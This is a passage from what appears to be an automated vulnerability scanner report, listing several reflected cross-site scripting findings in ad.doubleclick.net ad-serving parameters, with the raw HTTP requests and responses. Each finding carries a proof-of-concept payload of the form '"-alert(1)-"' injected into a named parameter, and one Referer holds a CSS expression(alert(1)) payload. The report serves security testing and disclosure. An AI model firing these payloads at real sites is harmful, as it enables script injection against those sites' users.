Cache-Control: private, x-gzip-ok=""
Content-Length: 6103

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
okv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSx0RE1pYldadEtCXzEscCw3NzYsMjk0NiwzMjUyMSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5&47f95"-alert(1)-"7b5fb722fd8=1http%3a%2f%2ft.mookie1.com/t/v1/clk%3FmigAgencyId%3D188%26migSource%3Dadsrv2%26migTrackDataExt%3D2426847%3B58824910%3B234278619%3B39992677%26migRandom%3D627943%26migTrackFmtExt%3Dclient%3Bio%3Bad%3Bc
...[SNIP]...

1.8. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.270604.B3/B5123509.61

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0038"-alert(1)-"d9468d0f92a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3740.270604.B3/B5123509.61;sz=728x90;pc=[TPAS_ID];ord=1297259897490;click=http://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSx0RE1pYldadEtCXzEscCw3NzYsMjk0NiwzMjUyMSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5e0038"-alert(1)-"d9468d0f92a HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=2599322840.14364759088493884&rb=445&ca=&rc=10.1&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre2599322834474&pb=&pc=&pd=&pg=&ct=1297259932284&pe=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1&pf=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 09 Feb 2011 13:59:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6015

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSx0RE1pYldadEtCXzEscCw3NzYsMjk0NiwzMjUyMSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5e0038"-alert(1)-"d9468d0f92ahttp://t.mookie1.com/t/v1/clk?migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58824910;234278619;39992915&migRandom=614224&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.universi
...[SNIP]...

1.9. http://ad.doubleclick.net/adi/N553.martinimedianet/B4970757.3 [campID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.martinimedianet/B4970757.3

Issue detail

The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9f05"-alert(1)-"c3c6134ad58 was submitted in the campID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.martinimedianet/B4970757.3;sz=728x90;click=http://ad.technoratimedia.com/clk?2,13%3Bbc1ea512b36e66d9%3B12e0ab5bca4,0%3B%3B%3B2343140080,XL5IAKvfDgD0zXgAAAAAABnVHgAAAAAAAgAAAAYAAAAAAP8AAAAECIhvGwAAAAAATbAfAAAAAADfpSgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.WQgAAAAAAAIAAwAAAAAAo7y1Ci4BAAAAAAAAADY5YjJkMWZjLTM0NTQtMTFlMC04NjBiLTAwMWIyNDc4NGE2MgAzmSoAAAA=,,http%3A%2F%2Fspeckyboy.com%2F,$http://t.invitemedia.com/track_click?auctionID=1297259805974763-83961&campID=64090d9f05"-alert(1)-"c3c6134ad58&crID=83961&pubICode=2076749&pub=281215&partnerID=38&url=http%3A%2F%2Fspeckyboy%2Ecom%2F&redirectURL=;pc=[TPAS_ID];ord=1297259805? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XL5IAKvfDgD0zXgAAAAAABnVHgAAAAAAAgAAAAYAAAAAAP8AAAAECIhvGwAAAAAATbAfAAAAAADfpSgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.WQgAAAAAAAIAAwAAAAAAjdtoAG.BBkBUMCqpE9AKQGQQWDm0SBlAl24Sg8DKHUDOzMzMzMwZQGZmZmZmZh5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADepf-VloGbCY5JXkJ8yQxUfqcfWMMwttvYibDSAAAAAA==,,http%3A%2F%2Fspeckyboy.com%2F,Z%3D728x90%26atf%3D0%26brw%3Dcr3%26efo%3D0%26os%3Dwn7%26pfm%3D1%26prm%3D0%26rtg%3Dga%26s%3D974763%26tblg%3Dch%26titn%3Dch%26tphv%3Dch%26ttch%3Dch%26uatRandNo%3D50691%26_salt%3D3626026624%26B%3D10%26u%3Dhttp%253A%252F%252Fspeckyboy.com%252F%26r%3D1,69b2d1fc-3454-11e0-860b-001b24784a62
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 09 Feb 2011 13:58:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7280

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
IAAwAAAAAAo7y1Ci4BAAAAAAAAADY5YjJkMWZjLTM0NTQtMTFlMC04NjBiLTAwMWIyNDc4NGE2MgAzmSoAAAA=,,http%3A%2F%2Fspeckyboy.com%2F,$http://t.invitemedia.com/track_click?auctionID=1297259805974763-83961&campID=64090d9f05"-alert(1)-"c3c6134ad58&crID=83961&pubICode=2076749&pub=281215&partnerID=38&url=http%3A%2F%2Fspeckyboy%2Ecom%2F&redirectURL=http%3a%2f%2fpersonalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var b
...[SNIP]...

1.10. http://ad.doubleclick.net/adi/N553.martinimedianet/B4970757.3 [crID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.martinimedianet/B4970757.3

Issue detail

The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7da0"-alert(1)-"1e6bc067315 was submitted in the crID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.martinimedianet/B4970757.3;sz=728x90;click=http://ad.technoratimedia.com/clk?2,13%3Bbc1ea512b36e66d9%3B12e0ab5bca4,0%3B%3B%3B2343140080,XL5IAKvfDgD0zXgAAAAAABnVHgAAAAAAAgAAAAYAAAAAAP8AAAAECIhvGwAAAAAATbAfAAAAAADfpSgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.WQgAAAAAAAIAAwAAAAAAo7y1Ci4BAAAAAAAAADY5YjJkMWZjLTM0NTQtMTFlMC04NjBiLTAwMWIyNDc4NGE2MgAzmSoAAAA=,,http%3A%2F%2Fspeckyboy.com%2F,$http://t.invitemedia.com/track_click?auctionID=1297259805974763-83961&campID=64090&crID=83961d7da0"-alert(1)-"1e6bc067315&pubICode=2076749&pub=281215&partnerID=38&url=http%3A%2F%2Fspeckyboy%2Ecom%2F&redirectURL=;pc=[TPAS_ID];ord=1297259805? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XL5IAKvfDgD0zXgAAAAAABnVHgAAAAAAAgAAAAYAAAAAAP8AAAAECIhvGwAAAAAATbAfAAAAAADfpSgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.WQgAAAAAAAIAAwAAAAAAjdtoAG.BBkBUMCqpE9AKQGQQWDm0SBlAl24Sg8DKHUDOzMzMzMwZQGZmZmZmZh5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADepf-VloGbCY5JXkJ8yQxUfqcfWMMwttvYibDSAAAAAA==,,http%3A%2F%2Fspeckyboy.com%2F,Z%3D728x90%26atf%3D0%26brw%3Dcr3%26efo%3D0%26os%3Dwn7%26pfm%3D1%26prm%3D0%26rtg%3Dga%26s%3D974763%26tblg%3Dch%26titn%3Dch%26tphv%3Dch%26ttch%3Dch%26uatRandNo%3D50691%26_salt%3D3626026624%26B%3D10%26u%3Dhttp%253A%252F%252Fspeckyboy.com%252F%26r%3D1,69b2d1fc-3454-11e0-860b-001b24784a62
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 09 Feb 2011 13:58:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7280

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
7y1Ci4BAAAAAAAAADY5YjJkMWZjLTM0NTQtMTFlMC04NjBiLTAwMWIyNDc4NGE2MgAzmSoAAAA=,,http%3A%2F%2Fspeckyboy.com%2F,$http://t.invitemedia.com/track_click?auctionID=1297259805974763-83961&campID=64090&crID=83961d7da0"-alert(1)-"1e6bc067315&pubICode=2076749&pub=281215&partnerID=38&url=http%3A%2F%2Fspeckyboy%2Ecom%2F&redirectURL=http%3a%2f%2fpersonalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same a
...[SNIP]...

1.11. http://ad.doubleclick.net/adi/N553.martinimedianet/B4970757.3 [partnerID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.martinimedianet/B4970757.3

Issue detail

The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66017"-alert(1)-"4b04cff3b6d was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.martinimedianet/B4970757.3;sz=728x90;click=http://ad.technoratimedia.com/clk?2,13%3Bbc1ea512b36e66d9%3B12e0ab5bca4,0%3B%3B%3B2343140080,XL5IAKvfDgD0zXgAAAAAABnVHgAAAAAAAgAAAAYAAAAAAP8AAAAECIhvGwAAAAAATbAfAAAAAADfpSgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.WQgAAAAAAAIAAwAAAAAAo7y1Ci4BAAAAAAAAADY5YjJkMWZjLTM0NTQtMTFlMC04NjBiLTAwMWIyNDc4NGE2MgAzmSoAAAA=,,http%3A%2F%2Fspeckyboy.com%2F,$http://t.invitemedia.com/track_click?auctionID=1297259805974763-83961&campID=64090&crID=83961&pubICode=2076749&pub=281215&partnerID=3866017"-alert(1)-"4b04cff3b6d&url=http%3A%2F%2Fspeckyboy%2Ecom%2F&redirectURL=;pc=[TPAS_ID];ord=1297259805? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XL5IAKvfDgD0zXgAAAAAABnVHgAAAAAAAgAAAAYAAAAAAP8AAAAECIhvGwAAAAAATbAfAAAAAADfpSgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.WQgAAAAAAAIAAwAAAAAAjdtoAG.BBkBUMCqpE9AKQGQQWDm0SBlAl24Sg8DKHUDOzMzMzMwZQGZmZmZmZh5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADepf-VloGbCY5JXkJ8yQxUfqcfWMMwttvYibDSAAAAAA==,,http%3A%2F%2Fspeckyboy.com%2F,Z%3D728x90%26atf%3D0%26brw%3Dcr3%26efo%3D0%26os%3Dwn7%26pfm%3D1%26prm%3D0%26rtg%3Dga%26s%3D974763%26tblg%3Dch%26titn%3Dch%26tphv%3Dch%26ttch%3Dch%26uatRandNo%3D50691%26_salt%3D3626026624%26B%3D10%26u%3Dhttp%253A%252F%252Fspeckyboy.com%252F%26r%3D1,69b2d1fc-3454-11e0-860b-001b24784a62
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 09 Feb 2011 13:59:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7280

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
04NjBiLTAwMWIyNDc4NGE2MgAzmSoAAAA=,,http%3A%2F%2Fspeckyboy.com%2F,$http://t.invitemedia.com/track_click?auctionID=1297259805974763-83961&campID=64090&crID=83961&pubICode=2076749&pub=281215&partnerID=3866017"-alert(1)-"4b04cff3b6d&url=http%3A%2F%2Fspeckyboy%2Ecom%2F&redirectURL=http%3a%2f%2fpersonalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never"
...[SNIP]...

1.12. http://ad.doubleclick.net/adi/N553.martinimedianet/B4970757.3 [pub parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.martinimedianet/B4970757.3

Issue detail

The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce398"-alert(1)-"d9ac9bb583e was submitted in the pub parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.martinimedianet/B4970757.3;sz=728x90;click=http://ad.technoratimedia.com/clk?2,13%3Bbc1ea512b36e66d9%3B12e0ab5bca4,0%3B%3B%3B2343140080,XL5IAKvfDgD0zXgAAAAAABnVHgAAAAAAAgAAAAYAAAAAAP8AAAAECIhvGwAAAAAATbAfAAAAAADfpSgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.WQgAAAAAAAIAAwAAAAAAo7y1Ci4BAAAAAAAAADY5YjJkMWZjLTM0NTQtMTFlMC04NjBiLTAwMWIyNDc4NGE2MgAzmSoAAAA=,,http%3A%2F%2Fspeckyboy.com%2F,$http://t.invitemedia.com/track_click?auctionID=1297259805974763-83961&campID=64090&crID=83961&pubICode=2076749&pub=281215ce398"-alert(1)-"d9ac9bb583e&partnerID=38&url=http%3A%2F%2Fspeckyboy%2Ecom%2F&redirectURL=;pc=[TPAS_ID];ord=1297259805? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XL5IAKvfDgD0zXgAAAAAABnVHgAAAAAAAgAAAAYAAAAAAP8AAAAECIhvGwAAAAAATbAfAAAAAADfpSgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.WQgAAAAAAAIAAwAAAAAAjdtoAG.BBkBUMCqpE9AKQGQQWDm0SBlAl24Sg8DKHUDOzMzMzMwZQGZmZmZmZh5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADepf-VloGbCY5JXkJ8yQxUfqcfWMMwttvYibDSAAAAAA==,,http%3A%2F%2Fspeckyboy.com%2F,Z%3D728x90%26atf%3D0%26brw%3Dcr3%26efo%3D0%26os%3Dwn7%26pfm%3D1%26prm%3D0%26rtg%3Dga%26s%3D974763%26tblg%3Dch%26titn%3Dch%26tphv%3Dch%26ttch%3Dch%26uatRandNo%3D50691%26_salt%3D3626026624%26B%3D10%26u%3Dhttp%253A%252F%252Fspeckyboy.com%252F%26r%3D1,69b2d1fc-3454-11e0-860b-001b24784a62
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 09 Feb 2011 13:59:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7280

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
TM0NTQtMTFlMC04NjBiLTAwMWIyNDc4NGE2MgAzmSoAAAA=,,http%3A%2F%2Fspeckyboy.com%2F,$http://t.invitemedia.com/track_click?auctionID=1297259805974763-83961&campID=64090&crID=83961&pubICode=2076749&pub=281215ce398"-alert(1)-"d9ac9bb583e&partnerID=38&url=http%3A%2F%2Fspeckyboy%2Ecom%2F&redirectURL=http%3a%2f%2fpersonalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptacc
...[SNIP]...

1.13. http://ad.doubleclick.net/adi/N553.martinimedianet/B4970757.3 [pubICode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.martinimedianet/B4970757.3

Issue detail

The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21f50"-alert(1)-"dcb5152624c was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.martinimedianet/B4970757.3;sz=728x90;click=http://ad.technoratimedia.com/clk?2,13%3Bbc1ea512b36e66d9%3B12e0ab5bca4,0%3B%3B%3B2343140080,XL5IAKvfDgD0zXgAAAAAABnVHgAAAAAAAgAAAAYAAAAAAP8AAAAECIhvGwAAAAAATbAfAAAAAADfpSgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.WQgAAAAAAAIAAwAAAAAAo7y1Ci4BAAAAAAAAADY5YjJkMWZjLTM0NTQtMTFlMC04NjBiLTAwMWIyNDc4NGE2MgAzmSoAAAA=,,http%3A%2F%2Fspeckyboy.com%2F,$http://t.invitemedia.com/track_click?auctionID=1297259805974763-83961&campID=64090&crID=83961&pubICode=207674921f50"-alert(1)-"dcb5152624c&pub=281215&partnerID=38&url=http%3A%2F%2Fspeckyboy%2Ecom%2F&redirectURL=;pc=[TPAS_ID];ord=1297259805? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XL5IAKvfDgD0zXgAAAAAABnVHgAAAAAAAgAAAAYAAAAAAP8AAAAECIhvGwAAAAAATbAfAAAAAADfpSgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.WQgAAAAAAAIAAwAAAAAAjdtoAG.BBkBUMCqpE9AKQGQQWDm0SBlAl24Sg8DKHUDOzMzMzMwZQGZmZmZmZh5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADepf-VloGbCY5JXkJ8yQxUfqcfWMMwttvYibDSAAAAAA==,,http%3A%2F%2Fspeckyboy.com%2F,Z%3D728x90%26atf%3D0%26brw%3Dcr3%26efo%3D0%26os%3Dwn7%26pfm%3D1%26prm%3D0%26rtg%3Dga%26s%3D974763%26tblg%3Dch%26titn%3Dch%26tphv%3Dch%26ttch%3Dch%26uatRandNo%3D50691%26_salt%3D3626026624%26B%3D10%26u%3Dhttp%253A%252F%252Fspeckyboy.com%252F%26r%3D1,69b2d1fc-3454-11e0-860b-001b24784a62
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 09 Feb 2011 13:58:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7281

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
Y5YjJkMWZjLTM0NTQtMTFlMC04NjBiLTAwMWIyNDc4NGE2MgAzmSoAAAA=,,http%3A%2F%2Fspeckyboy.com%2F,$http://t.invitemedia.com/track_click?auctionID=1297259805974763-83961&campID=64090&crID=83961&pubICode=207674921f50"-alert(1)-"dcb5152624c&pub=281215&partnerID=38&url=http%3A%2F%2Fspeckyboy%2Ecom%2F&redirectURL=http%3a%2f%2fpersonalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcall
...[SNIP]...

1.14. http://ad.doubleclick.net/adi/N553.martinimedianet/B4970757.3 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.martinimedianet/B4970757.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e2e6"-alert(1)-"2470cde73b was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.martinimedianet/B4970757.3;sz=728x90;click=http://ad.technoratimedia.com/clk?2,13%3Bbc1ea512b36e66d9%3B12e0ab5bca4,0%3B%3B%3B2343140080,XL5IAKvfDgD0zXgAAAAAABnVHgAAAAAAAgAAAAYAAAAAAP8AAAAECIhvGwAAAAAATbAfAAAAAADfpSgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.WQgAAAAAAAIAAwAAAAAAo7y1Ci4BAAAAAAAAADY5YjJkMWZjLTM0NTQtMTFlMC04NjBiLTAwMWIyNDc4NGE2MgAzmSoAAAA=,,http%3A%2F%2Fspeckyboy.com%2F,$http://t.invitemedia.com/track_click?auctionID=1297259805974763-839613e2e6"-alert(1)-"2470cde73b&campID=64090&crID=83961&pubICode=2076749&pub=281215&partnerID=38&url=http%3A%2F%2Fspeckyboy%2Ecom%2F&redirectURL=;pc=[TPAS_ID];ord=1297259805? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XL5IAKvfDgD0zXgAAAAAABnVHgAAAAAAAgAAAAYAAAAAAP8AAAAECIhvGwAAAAAATbAfAAAAAADfpSgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.WQgAAAAAAAIAAwAAAAAAjdtoAG.BBkBUMCqpE9AKQGQQWDm0SBlAl24Sg8DKHUDOzMzMzMwZQGZmZmZmZh5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADepf-VloGbCY5JXkJ8yQxUfqcfWMMwttvYibDSAAAAAA==,,http%3A%2F%2Fspeckyboy.com%2F,Z%3D728x90%26atf%3D0%26brw%3Dcr3%26efo%3D0%26os%3Dwn7%26pfm%3D1%26prm%3D0%26rtg%3Dga%26s%3D974763%26tblg%3Dch%26titn%3Dch%26tphv%3Dch%26ttch%3Dch%26uatRandNo%3D50691%26_salt%3D3626026624%26B%3D10%26u%3Dhttp%253A%252F%252Fspeckyboy.com%252F%26r%3D1,69b2d1fc-3454-11e0-860b-001b24784a62
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 09 Feb 2011 13:58:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7271

